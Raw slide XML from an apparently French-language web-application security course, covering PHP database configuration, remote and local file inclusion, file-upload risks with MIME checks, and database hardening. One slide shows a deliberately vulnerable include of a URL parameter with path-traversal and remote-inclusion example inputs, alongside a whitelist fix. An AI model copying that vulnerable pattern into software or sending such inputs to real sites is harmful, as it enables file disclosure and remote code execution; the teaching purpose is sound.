              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>mypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>$db = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql_connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>($host, $username, $password);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>(Config.bdd)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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Inclusion de code distant (RFI)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Principe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> $_GET[’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>’];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Risques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Accès à des fichiers locaux non publics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>script.php?path=../../hidden.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Injection de fichiers distants (RFI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>script.php ?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>=http%3A%2F%2Fexample.com%2Frfi.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Construire une </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>white-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> par un tableau fixe</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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4400" b="1" dirty="0" smtClean="0"/>
              <a:t>Constat d'un consultant en sécurité </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(HERVÉ SCHAUER CONSULTANT)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Les problèmes de sécurité se sont déplacés</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Jusqu'en 1999/2000, les plus gros problèmes étaient trouvés dans l'infrastructure (routeurs, filtrages) ou sur les logiciels serveurs (failles IIS, failles Apache, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>sendmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>, ...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Ces problèmes sont de mieux en mieux appréhendés par les administrateurs et les hébergeurs (upgrade massif de machines, application automatisée des correctifs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Les applications sont de plus en plus la cible des attaques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>La sécurité des applications n'a pas évolué</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Elle a même probablement baissé (les applications se complexifiant)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>On voit des horreurs, même par de grands noms de l'industrie logicielle ....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Les langages de programmation sont indirectement responsables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>upload</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1935480"/>
            <a:ext cx="8686800" cy="4389120"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>HTML d’un formulaire d’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;form action="upload.php" method="POST"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>enctype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>multipart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>-data"&gt;&lt;p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Fichier à déposer :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;input type="hidden" name="MAX_FILE_SIZE" value="1024" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;input type="file" name="attachment" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;input type="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>" value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Deposer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;/p&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Risque : Le fichier envoyé est un script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>En PHP, les informations sur le fichier reçu sont dans $_FILES.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>upload</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Vérifier le type de fichier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>finfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>finfo_open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>(FILEINFO_MIME);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>finfo_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> ($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>finfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>, $_FILES['fichier']['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>']);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>finfo_close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>finfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Queqlues</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> types MIME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>/html </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>image/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>gif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>application/vnd.ms-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>excel</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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Sécuriser l’accès à la base de données</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Utiliser un compte adapté</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Pas de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>, droits en écriture seulement si nécessaire.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Attention aux messages d’erreur détaillés</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>En cas d’erreur de syntaxe ou de serveur indisponible,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>afficher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Internal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> au lieu de :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Warning : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql_connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>() [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>function.mysql-connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>] : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Access denied for user ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lambda’@’localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’ (using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> : YES)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
